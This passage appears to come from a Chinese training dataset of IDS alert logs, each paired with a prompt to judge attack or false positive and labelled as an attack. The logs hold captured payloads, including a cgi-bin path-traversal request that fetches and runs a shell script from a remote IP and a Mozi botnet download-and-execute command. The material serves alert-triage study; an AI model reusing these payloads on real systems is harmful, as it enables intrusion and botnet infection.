"1.程序在实现上没有充分过滤用户输入的../之类的目录跳转符,导致恶意用户可以通过提交目录跳转来遍历服务器上的任意文件。\r\n2.目录遍历攻击可使攻击者越权直接查看整个网站的目录结构及文件,并且可能利用此类型攻击跨目录上传下载服务器中敏感文件。", "dport": "80", "alert_devip": "172.31.191.57", "update_time": "1732682564", "code_language": "通用", "public_date": "2018-08-16 18:57:22", "skyeye_serial_num": "QbJK/8ze/", "site_app": "通用", "super_attack_chain": "0x02000000", "hit_end": "253", "h_proto_version": "HTTP/1.1", "uri": "/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "rule_id": "0x1002055d", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "36.138.238.230", "host_md5": "299fbf4de45e4bdbc60c66ca300e9045", "user-agent": "Custom-AsyncHttpClient", "vlan_id": "", "vuln_type": "发现目录穿越攻击行为", "attack_type": "目录遍历", "is_web_attack": "1", "dip": "172.31.193.243", "repeat_count": "1", "skyeye_type": "webids-webattack_dolog", "solution": "1.对用户的输入进行验证,特别是路径替代目录跳转符\r\n2.尽可能采用白名单的形式,验证所有输入\r\n3.合理配置web服务器的目录权限", "hit_start": "233", "skyeye_id": "", "payload": {"req_header": "UE9TVCAvY2dpLWJpbi8uJTJlLy4lMmUvLiUyZS8uJTJlLy4lMmUvLiUyZS8uJTJlLy4lMmUvLiUyZS8uJTJlL2Jpbi9zaCBIVFRQLzEuMQ0KSG9zdDogMjE4Ljc2LjE1LjE3OjgwDQpBY2NlcHQ6ICovKg0KVXBncmFkZS1JbnNlY3VyZS1SZXF1ZXN0czogMQ0KVXNlci1BZ2VudDogQ3VzdG9tLUFzeW5jSHR0cENsaWVudA0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KQ29udGVudC1UeXBlOiB0ZXh0L3BsYWluDQpDb250ZW50LUxlbmd0aDogMTAzDQoNCg==", "req_body": "WD0kKGN1cmwgaHR0cDovLzQ1LjIwMi4zNS4xOTAvc2ggfHwgd2dldCBodHRwOi8vNDUuMjAyLjM1LjE5MC9zaCAtTy0pOyBlY2hvICIkWCIgfCBzaCAtcyBhcGFjaGUuc2VsZnJlcA==", "rsp_header": "", "rsp_body": ""}, "host": "218.76.15.17:80", "host_state": "失败", "rsp_body": "", "rule_desc": "网页漏洞利用", "proto": "http", "alarm_id": "20241127_3bbdb346a88e2e65ea3303e646284ab5", "access_time": "2024-11-27 12:43:04", "content-length": "103", "attack_addr": "中国(39.902798/116.401159)", "type_chain": "160B0000", "dip_addr": "局域网", "rsp_status": "0", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "upgrade-insecure-requests": "1", "content-type": "text/plain", "sip": "36.138.238.230", "dimension": "3", "url_path": "/cgi-bin/../../../../../../../../../../bin/sh", "src_mac": "00:94:a1:5e:6e:87", "file_name": "", "confidence": "中", "rsp_header": "", "super_type": "攻击利用", "serial_num": "QbJK/8ze/", "tcp_option": "", "req_header": "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1\r\nHost: 218.76.15.17:80\r\nAccept: */*\r\nUpgrade-Insecure-Requests: 1\r\nUser-Agent: Custom-AsyncHttpClient\r\nConnection: keep-alive\r\nContent-Type: text/plain\r\nContent-Length: 103\r\n\r\n", "req_body": "X=$(curl http://45.202.35.190/sh || wget http://45.202.35.190/sh -O-); echo \"$X\" | sh -s apache.selfrep", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268567901-发现目录穿越攻击行为", "rule_labels": "{\"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"hw_type\": \"PC\"}}", "sport": "54892", "h_url": "/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732682584", "rule_version_str": "3.0.1122.14572", "dip_group": "未分配资产组", "nid": "", "sip_group": "", "type": "目录遍历", "_origin": {"write_date": 1732682584, "vuln_harm": "路径穿越攻击可以泄露敏感文件信息。", "rule_version_str": "3.0.1122.14572", "hit_field": "", "dip": "172.31.193.243", "site_app": "", "hit_end": 0, "uri": "/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh", "dport": 80, "vuln_name": "路径穿越攻击(机器学习)", "rsp_status": 0, "code_language": "", "solution": "1.对用户的输入进行验证,特别是路径替代目录跳转符\r\n2.尽可能采用白名单的形式,验证所有输入,对输入参数过滤../等字符。\r\n3.合理配置web服务器的目录权限,禁止目录遍历。", "hit_start": 0, "detail_info": "通过机器学习方式,检测到访问中存在路径穿越攻击或扫描代码。", "xff": "", "sip": "36.138.238.230", "vuln_desc": "通过机器学习方式,检测到访问中存在路径穿越攻击或扫描代码。", "public_date": "2020-11-25 19:44:53", "sport": 54892}, "detail_info": "通过机器学习方式,检测到访问中存在路径穿越攻击或扫描代码。", "file_md5": "", "rule_key": "webids", "connection": "keep-alive", "api": "218.76.15.17:80/cgi-bin/../../../../../../../../../../bin/sh", "first_access_time": "2024-11-27 12:43:04", "hazard_level": "4", "hazard_rating": "中危", "hit_field": "", "h_method": "POST", "sip_addr": "中国", "x_forwarded_for": "", "accept": "*/*", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "路径穿越攻击(机器学习)", "alarm_sip": "172.31.193.243", "skyeye_index": "", "sip_ioc_dip": "012899ef7557806d42d3f9e639b31a69", "xff": "", "vuln_desc": "通过机器学习方式,检测到访问中存在路径穿越攻击或扫描代码。", "attack_chain": "0x02010000", "vuln_harm": "路径穿越攻击可以泄露敏感文件信息。", "dport": "80", "alert_devip": "172.31.191.57", "update_time": "1732682564", "code_language": "", "public_date": "2020-11-25 19:44:53", "skyeye_serial_num": "QbJK/8ze/", "site_app": "", "super_attack_chain": "0x02000000", "hit_end": "0", "h_proto_version": "HTTP/1.1", "uri": "/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "rule_id": "0x10020b6b", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "36.138.238.230", "host_md5": "299fbf4de45e4bdbc60c66ca300e9045", "user-agent": "Custom-AsyncHttpClient", "vlan_id": "", "vuln_type": "路径穿越攻击(机器学习)", "attack_type": "目录遍历", "is_web_attack": "1", "dip": "172.31.193.243", "repeat_count": "1", "skyeye_type": "webids-webattack_dolog", "solution": "1.对用户的输入进行验证,特别是路径替代目录跳转符\r\n2.尽可能采用白名单的形式,验证所有输入,对输入参数过滤../等字符。\r\n3.合理配置web服务器的目录权限,禁止目录遍历。", "hit_start": "0", "skyeye_id": "", "payload": {"req_header": "UE9TVCAvY2dpLWJpbi8uJTJlLy4lMmUvLiUyZS8uJTJlLy4lMmUvLiUyZS8uJTJlLy4lMmUvLiUyZS8uJTJlL2Jpbi9zaCBIVFRQLzEuMQ0KSG9zdDogMjE4Ljc2LjE1LjE3OjgwDQpBY2NlcHQ6ICovKg0KVXBncmFkZS1JbnNlY3VyZS1SZXF1ZXN0czogMQ0KVXNlci1BZ2VudDogQ3VzdG9tLUFzeW5jSHR0cENsaWVudA0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KQ29udGVudC1UeXBlOiB0ZXh0L3BsYWluDQpDb250ZW50LUxlbmd0aDogMTAzDQoNCg==", "req_body": "WD0kKGN1cmwgaHR0cDovLzQ1LjIwMi4zNS4xOTAvc2ggfHwgd2dldCBodHRwOi8vNDUuMjAyLjM1LjE5MC9zaCAtTy0pOyBlY2hvICIkWCIgfCBzaCAtcyBhcGFjaGUuc2VsZnJlcA==", "rsp_header": "", "rsp_body": ""}, "host": "218.76.15.17:80", "host_state": "失败", "rsp_body": "", "rule_desc": "网页漏洞利用", "proto": "http", "alarm_id": "20241127_4c9085a20ea08ed818bb729f794228eb", "access_time": "2024-11-27 12:43:04", "content-length": "103", "attack_addr": "中国(39.902798/116.401159)", "type_chain": "160B0000", "dip_addr": "局域网", "rsp_status": "0", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "upgrade-insecure-requests": "1", "content-type": "text/plain", "sip": "36.138.238.230", "dimension": "3", "url_path": "/cgi-bin/../../../../../../../../../../bin/sh", "src_mac": "00:94:a1:5e:6e:87", "file_name": "", "confidence": "高", "rsp_header": "", "super_type": "攻击利用", "serial_num": "QbJK/8ze/", "tcp_option": "", "req_header": "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1\r\nHost: 218.76.15.17:80\r\nAccept: */*\r\nUpgrade-Insecure-Requests: 1\r\nUser-Agent: Custom-AsyncHttpClient\r\nConnection: keep-alive\r\nContent-Type: text/plain\r\nContent-Length: 103\r\n\r\n", "req_body": "X=$(curl http://45.202.35.190/sh || wget http://45.202.35.190/sh -O-); echo \"$X\" | sh -s apache.selfrep", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268569451-路径穿越攻击(机器学习)", "rule_labels": "{}", "sport": "54892", "h_url": "/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732682584", "rule_version_str": "3.0.1122.14572", "dip_group": "未分配资产组", "nid": "", "sip_group": "", "type": "命令执行", "_origin": {"write_date": 1732682584, "vuln_harm": "受害主机能被植入后门、远控或木马,导致受害主机已经沦陷,成为傀儡机。", "rule_version_str": "3.0.1122.14572", "hit_field": "req_body", "dip": "172.31.193.243", "site_app": "通用", "hit_end": 11, "uri": "/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh", "dport": 80, "vuln_name": "通用命令执行漏洞", "rsp_status": 0, "code_language": "通用", "solution": "请尽快排查受害主机上是否存在相关恶意程序并进行查杀,并修复系统漏洞。", "hit_start": 0, "detail_info": "攻击者已经能够执行任意系统命令。", "xff": "", "sip": "36.138.238.230", "vuln_desc": "攻击者已经能够执行任意系统命令。", "public_date": "2019-05-13 18:09:13", "sport": 54892}, "detail_info": "攻击者已经能够执行任意系统命令。", "file_md5": "", "rule_key": "webids", "connection": "keep-alive", "api": "218.76.15.17:80/cgi-bin/../../../../../../../../../../bin/sh", "first_access_time": "2024-11-27 12:43:04", "hazard_level": "8", "hazard_rating": "危急", "hit_field": "req_body", "h_method": "POST", "sip_addr": "中国", "x_forwarded_for": "", "accept": "*/*", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "通用命令执行漏洞", "alarm_sip": "172.31.193.243", "skyeye_index": "", "sip_ioc_dip": "9baf6a8abe581b2365fa48441f777755", "xff": "", "vuln_desc": "攻击者已经能够执行任意系统命令。", "attack_chain": "0x02020000", "vuln_harm": "受害主机能被植入后门、远控或木马,导致受害主机已经沦陷,成为傀儡机。", "dport": "80", "alert_devip": "172.31.191.57", "update_time": "1732682564", "code_language": "通用", "public_date": "2019-05-13 18:09:13", "skyeye_serial_num": "QbJK/8ze/", "site_app": "通用", "super_attack_chain": "0x02000000", "hit_end": "11", "h_proto_version": "HTTP/1.1", "uri": "/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "rule_id": "0x100215d7", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "36.138.238.230", "host_md5": "299fbf4de45e4bdbc60c66ca300e9045", "user-agent": "Custom-AsyncHttpClient", "vlan_id": "", "vuln_type": "通用命令执行漏洞", "attack_type": "命令执行", "is_web_attack": "1", "dip": "172.31.193.243", "repeat_count": "1", "skyeye_type": "webids-webattack_dolog", "solution": "请尽快排查受害主机上是否存在相关恶意程序并进行查杀,并修复系统漏洞。", "hit_start": "0", "skyeye_id": "", "payload": {"req_header": "UE9TVCAvY2dpLWJpbi8uJTJlLy4lMmUvLiUyZS8uJTJlLy4lMmUvLiUyZS8uJTJlLy4lMmUvLiUyZS8uJTJlL2Jpbi9zaCBIVFRQLzEuMQ0KSG9zdDogMjE4Ljc2LjE1LjE3OjgwDQpBY2NlcHQ6ICovKg0KVXBncmFkZS1JbnNlY3VyZS1SZXF1ZXN0czogMQ0KVXNlci1BZ2VudDogQ3VzdG9tLUFzeW5jSHR0cENsaWVudA0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KQ29udGVudC1UeXBlOiB0ZXh0L3BsYWluDQpDb250ZW50LUxlbmd0aDogMTAzDQoNCg==", "req_body": "WD0kKGN1cmwgaHR0cDovLzQ1LjIwMi4zNS4xOTAvc2ggfHwgd2dldCBodHRwOi8vNDUuMjAyLjM1LjE5MC9zaCAtTy0pOyBlY2hvICIkWCIgfCBzaCAtcyBhcGFjaGUuc2VsZnJlcA==", "rsp_header": "", "rsp_body": ""}, "host": "218.76.15.17:80", "host_state": "失败", "rsp_body": "", "rule_desc": "网页漏洞利用", "proto": "http", "alarm_id": "20241127_2490e3dcf015536fa58fca97829088f3", "access_time": "2024-11-27 12:43:04", "content-length": "103", "attack_addr": "中国(39.902798/116.401159)", "type_chain": "16090000", "dip_addr": "局域网", "rsp_status": "0", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "upgrade-insecure-requests": "1", "content-type": "text/plain", "sip": "36.138.238.230", "dimension": "3", "url_path": "/cgi-bin/../../../../../../../../../../bin/sh", "src_mac": "00:94:a1:5e:6e:87", "file_name": "", "confidence": "高", "rsp_header": "", "super_type": "攻击利用", "serial_num": "QbJK/8ze/", "tcp_option": "", "req_header": "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1\r\nHost: 218.76.15.17:80\r\nAccept: */*\r\nUpgrade-Insecure-Requests: 1\r\nUser-Agent: Custom-AsyncHttpClient\r\nConnection: keep-alive\r\nContent-Type: text/plain\r\nContent-Length: 103\r\n\r\n", "req_body": "X=$(curl http://45.202.35.190/sh || wget http://45.202.35.190/sh -O-); echo \"$X\" | sh -s apache.selfrep", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268572119-通用命令执行漏洞", "rule_labels": "{\"0x110700\": {\"parent_name\": \"\", \"type\": \"\", \"name\": \"二次访问分析\", \"parent_id\": \"0\", \"info\": \"45.202.35.190\", \"proto\": \"TCP\"}, \"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"hw_type\": \"PC\"}}", "sport": "54892", "h_url": "/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732680083", "vlan_id": "", "vuln_type": "Shell命令执行(机器学习)", "rule_version_str": "3.0.1122.14572", "attack_type": "命令执行", "dip_group": "未分配资产组", "is_web_attack": "1", "nid": "", "dip": "172.23.64.208", "sip_group": "", "repeat_count": "1", "type": "命令执行", "skyeye_type": "webids-webattack_dolog", "_origin": {"write_date": 1732680083, "vuln_harm": "shell命令执行攻击是危害极高的攻击形式,攻击成功可以造成服务器被控制。", "rule_version_str": "3.0.1122.14572", "hit_field": "", "dip": "172.23.64.208", "site_app": "", "hit_end": 0, "uri": "/shell?cd+/tmp;rm+-rf+*;wget+http://103.203.72.158:55009/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws", "dport": 80, "vuln_name": "Shell命令执行(机器学习)", "rsp_status": 0, "code_language": "", "solution": "后端服务器语言中,严禁执行shell命令。", "hit_start": 0, "detail_info": "通过机器学习方式,检测到访问中存在shell命令执行攻击代码。", "xff": "", "sip": "103.203.72.158", "vuln_desc": "通过机器学习方式,检测到访问中存在shell命令执行攻击代码。", "public_date": "2020-11-25 19:51:41", "sport": 63607}, "solution": "后端服务器语言中,严禁执行shell命令。", "hit_start": "0", "skyeye_id": "", "payload": {"req_header": "R0VUIC9zaGVsbD9jZCsvdG1wO3JtKy1yZisqO3dnZXQraHR0cDovLzEwMy4yMDMuNzIuMTU4OjU1MDA5L01vemkuYTtjaG1vZCs3NzcrTW96aS5hOy90bXAvTW96aS5hK2phd3MgSFRUUC8xLjENClVzZXItQWdlbnQ6IEhlbGxvLCB3b3JsZA0KSG9zdDogMjE4Ljc2LjE1LjEyOjgwDQpBY2NlcHQ6IHRleHQvaHRtbCxhcHBsaWNhdGlvbi94aHRtbCt4bWwsYXBwbGljYXRpb24veG1sO3E9MC45LGltYWdlL3dlYnAsKi8qO3E9MC44DQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg==", "req_body": "", "rsp_header": "", "rsp_body": ""}, "detail_info": "通过机器学习方式,检测到访问中存在shell命令执行攻击代码。", "file_md5": "", "host": "218.76.15.12:80", "host_state": "失败", "rule_key": "webids", "connection": "keep-alive", "api": "218.76.15.12:80/shell", "first_access_time": "2024-11-27 12:01:23", "hazard_level": "6", "hazard_rating": "高危", "hit_field": "", "rsp_body": "", "h_method": "GET", "sip_addr": "印度", "x_forwarded_for": "", "accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "Shell命令执行(机器学习)", "alarm_sip": "172.23.64.208", "rule_desc": "网页漏洞利用", "skyeye_index": "", "sip_ioc_dip": "8a18d5b93120b7abc6b629956beb81c6", "proto": "http", "xff": "", "alarm_id": "20241127_d6621c1efaa1429526cefc8b3e110d2e", "vuln_desc": "通过机器学习方式,检测到访问中存在shell命令执行攻击代码。", "attack_chain": "0x02020000", "access_time": "2024-11-27 12:01:23", "attack_addr": "印度(19.009570/72.844684)", "type_chain": "16090000", "vuln_harm": "shell命令执行攻击是危害极高的攻击形式,攻击成功可以造成服务器被控制。", "dip_addr": "局域网", "dport": "80", "alert_devip": "172.31.191.57", "rsp_status": "0", "update_time": "1732680063", "code_language": "", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "sip": "103.203.72.158", "public_date": "2020-11-25 19:51:41", "dimension": "3", "skyeye_serial_num": "QbJK/8ze/", "url_path": "/shell", "src_mac": "00:94:a1:5e:6e:87", "file_name": "", "confidence": "高", "rsp_header": "", "super_type": "攻击利用", "site_app": "", "super_attack_chain": "0x02000000", "hit_end": "0", "h_proto_version": "HTTP/1.1", "serial_num": "QbJK/8ze/", "uri": "/shell?cd+/tmp;rm+-rf+*;wget+http://103.203.72.158:55009/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "tcp_option": "", "rule_id": "0x10020b6e", "req_header": "GET /shell?cd+/tmp;rm+-rf+*;wget+http://103.203.72.158:55009/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1\r\nUser-Agent: Hello, world\r\nHost: 218.76.15.12:80\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nConnection: keep-alive\r\n\r\n", "req_body": "", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "103.203.72.158", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268569454-Shell命令执行(机器学习)", "rule_labels": "{\"0x110700\": {\"parent_name\": \"\", \"type\": \"\", \"name\": \"二次访问分析\", \"parent_id\": \"0\", \"info\": \"103.203.72.158\", \"port\": \"55009\", \"proto\": \"TCP\"}}", "host_md5": "47cbf35b96a43f8ea77926c9a3fa4d22", "sport": "63607", "h_url": "/shell?cd+/tmp;rm+-rf+*;wget+http://103.203.72.158:55009/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws", "user-agent": "Hello, world"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732680083", "vlan_id": "", "vuln_type": "发现后门程序 Mozi.P2P Botnet 攻击探测行为", "rule_version_str": "3.0.1122.14572", "attack_type": "后门程序", "dip_group": "未分配资产组", "is_web_attack": "1", "nid": "", "dip": "172.23.64.208", "sip_group": "", "repeat_count": "1", "type": "后门程序", "skyeye_type": "webids-webattack_dolog", "_origin": {"write_date": 1732680083, "vuln_harm": "Mozi僵尸网络会利用一些已知漏洞Payload发起探测攻击,攻击成功则可连接网络节点下载并执行名为Mozi.a、Mozi.m、Mozi.z等僵尸网络样本,注册自身为新的僵尸网络节点。受攻击的设备包括GPON光纤设备、NetGear路由设备、华为HG532交换机系列、D-Link路由设备、使用Realtek SDK的设备、Vacron监控摄像机、斐讯路由器、 USR-G806 4G工业无线路由器等。", "rule_version_str": "3.0.1122.14572", "hit_field": "req_header", "dip": "172.23.64.208", "site_app": "", "hit_end": 66, "uri": "/shell?cd+/tmp;rm+-rf+*;wget+http://103.203.72.158:55009/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws", "dport": 80, "vuln_name": "发现后门程序 Mozi.P2P Botnet 攻击探测行为", "rsp_status": 0, "code_language": "", "solution": "确认攻击流量源IP设备状态,查杀清除后门并进行安全加固。", "hit_start": 46, "detail_info": "Mozi僵尸网络是于2019年底首次出现在针对路由器和DVR 的攻击场景上的一种P2P僵尸网络。主要攻击目标为物联网(IoT)设备,包括网件、D-Link和华为等路由设备。", "xff": "", "sip": "103.203.72.158", "vuln_desc": "Mozi僵尸网络是于2019年底首次出现在针对路由器和DVR 的攻击场景上的一种P2P僵尸网络。主要攻击目标为物联网(IoT)设备,包括网件、D-Link和华为等路由设备。", "public_date": "2023-03-31 14:48:07", "sport": 63607}, "solution": "确认攻击流量源IP设备状态,查杀清除后门并进行安全加固。", "hit_start": "46", "skyeye_id": "", "payload": {"req_header": "R0VUIC9zaGVsbD9jZCsvdG1wO3JtKy1yZisqO3dnZXQraHR0cDovLzEwMy4yMDMuNzIuMTU4OjU1MDA5L01vemkuYTtjaG1vZCs3NzcrTW96aS5hOy90bXAvTW96aS5hK2phd3MgSFRUUC8xLjENClVzZXItQWdlbnQ6IEhlbGxvLCB3b3JsZA0KSG9zdDogMjE4Ljc2LjE1LjEyOjgwDQpBY2NlcHQ6IHRleHQvaHRtbCxhcHBsaWNhdGlvbi94aHRtbCt4bWwsYXBwbGljYXRpb24veG1sO3E9MC45LGltYWdlL3dlYnAsKi8qO3E9MC44DQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg==", "req_body": "", "rsp_header": "", "rsp_body": ""}, "detail_info": "Mozi僵尸网络是于2019年底首次出现在针对路由器和DVR 的攻击场景上的一种P2P僵尸网络。主要攻击目标为物联网(IoT)设备,包括网件、D-Link和华为等路由设备。", "file_md5": "", "host": "218.76.15.12:80", "host_state": "失败", "rule_key": "webids", "connection": "keep-alive", "api": "218.76.15.12:80/shell", "first_access_time": "2024-11-27 12:01:23", "hazard_level": "6", "hazard_rating": "高危", "hit_field": "req_header", "rsp_body": "", "h_method": "GET", "sip_addr": "印度", "x_forwarded_for": "", "accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "发现后门程序 Mozi.P2P Botnet 攻击探测行为", "alarm_sip": "172.23.64.208", "rule_desc": "网页漏洞利用", "skyeye_index": "", "sip_ioc_dip": "6e5e7e9a0bce33d7747447c47b9695c6", "proto": "http", "xff": "", "alarm_id": "20241127_d3836a1c47adf1c2c874c2fe77874640", "vuln_desc": "Mozi僵尸网络是于2019年底首次出现在针对路由器和DVR 的攻击场景上的一种P2P僵尸网络。主要攻击目标为物联网(IoT)设备,包括网件、D-Link和华为等路由设备。", "attack_chain": "0x02020000", "access_time": "2024-11-27 12:01:23", "attack_addr": "印度(19.009570/72.844684)", "type_chain": "14010000", "vuln_harm": "Mozi僵尸网络会利用一些已知漏洞Payload发起探测攻击,攻击成功则可连接网络节点下载并执行名为Mozi.a、Mozi.m、Mozi.z等僵尸网络样本,注册自身为新的僵尸网络节点。受攻击的设备包括GPON光纤设备、NetGear路由设备、华为HG532交换机系列、D-Link路由设备、使用Realtek SDK的设备、Vacron监控摄像机、斐讯路由器、 USR-G806 4G工业无线路由器等。", "dip_addr": "局域网", "dport": "80", "alert_devip": "172.31.191.57", "rsp_status": "0", "update_time": "1732680063", "code_language": "", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "sip": "103.203.72.158", "public_date": "2023-03-31 14:48:07", "dimension": "3", "skyeye_serial_num": "QbJK/8ze/", "url_path": "/shell", "src_mac": "00:94:a1:5e:6e:87", "file_name": "", "confidence": "高", "rsp_header": "", "super_type": "恶意软件", "site_app": "", "super_attack_chain": "0x02000000", "hit_end": "66", "h_proto_version": "HTTP/1.1", "serial_num": "QbJK/8ze/", "uri": "/shell?cd+/tmp;rm+-rf+*;wget+http://103.203.72.158:55009/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "tcp_option": "", "rule_id": "0x10020bd8", "req_header": "GET /shell?cd+/tmp;rm+-rf+*;wget+http://103.203.72.158:55009/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1\r\nUser-Agent: Hello, world\r\nHost: 218.76.15.12:80\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nConnection: keep-alive\r\n\r\n", "req_body": "", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "103.203.72.158", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268569560-发现后门程序 Mozi.P2P Botnet 攻击探测行为", "rule_labels": "{\"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"hw_type\": \"PC\"}}", "host_md5": "47cbf35b96a43f8ea77926c9a3fa4d22", "sport": "63607", "h_url": "/shell?cd+/tmp;rm+-rf+*;wget+http://103.203.72.158:55009/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws", "user-agent": "Hello, world"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732680083", "vlan_id": "", "vuln_type": "发现系统命令注入行为", "rule_version_str": "3.0.1122.14572", "attack_type": "命令执行", "dip_group": "未分配资产组", "is_web_attack": "1", "nid": "", "dip": "172.23.64.208", "sip_group": "", "repeat_count": "1", "type": "命令执行", "skyeye_type": "webids-webattack_dolog", "_origin": {"write_date": 1732680083, "vuln_harm": "攻击成功可以造成服务器被控制。", "rule_version_str": "3.0.1122.14572", "hit_field": "req_header", "dip": "172.23.64.208", "site_app": "其他", "hit_end": 266, "uri": "/shell?cd+/tmp;rm+-rf+*;wget+http://103.203.72.158:55009/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws", "dport": 80, "vuln_name": "发现系统命令注入行为", "rsp_status": 0, "code_language": "其他", "solution": "1.禁掉一些不用的系统命令执行函数。\r\n2.权限控制严格。", "hit_start": 246, "detail_info": "命令执行攻击是危害极高的攻击形式,一般是服务器代码对用户输入控制不严格导致执行任意命令,也包含攻击者上传了一个后门,通过后门执行了任意命令。", "xff": "", "sip": "103.203.72.158", "vuln_desc": "命令执行攻击是危害极高的攻击形式,一般是服务器代码对用户输入控制不严格导致执行任意命令,也包含攻击者上传了一个后门,通过后门执行了任意命令。", "public_date": "2018-04-03 17:04:56", "sport": 63607}, "solution": "1.禁掉一些不用的系统命令执行函数。\r\n2.权限控制严格。", "hit_start": "246", "skyeye_id": "", "payload": {"req_header": "R0VUIC9zaGVsbD9jZCsvdG1wO3JtKy1yZisqO3dnZXQraHR0cDovLzEwMy4yMDMuNzIuMTU4OjU1MDA5L01vemkuYTtjaG1vZCs3NzcrTW96aS5hOy90bXAvTW96aS5hK2phd3MgSFRUUC8xLjENClVzZXItQWdlbnQ6IEhlbGxvLCB3b3JsZA0KSG9zdDogMjE4Ljc2LjE1LjEyOjgwDQpBY2NlcHQ6IHRleHQvaHRtbCxhcHBsaWNhdGlvbi94aHRtbCt4bWwsYXBwbGljYXRpb24veG1sO3E9MC45LGltYWdlL3dlYnAsKi8qO3E9MC44DQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg==", "req_body": "", "rsp_header": "", "rsp_body": ""}, "detail_info": "命令执行攻击是危害极高的攻击形式,一般是服务器代码对用户输入控制不严格导致执行任意命令,也包含攻击者上传了一个后门,通过后门执行了任意命令。", 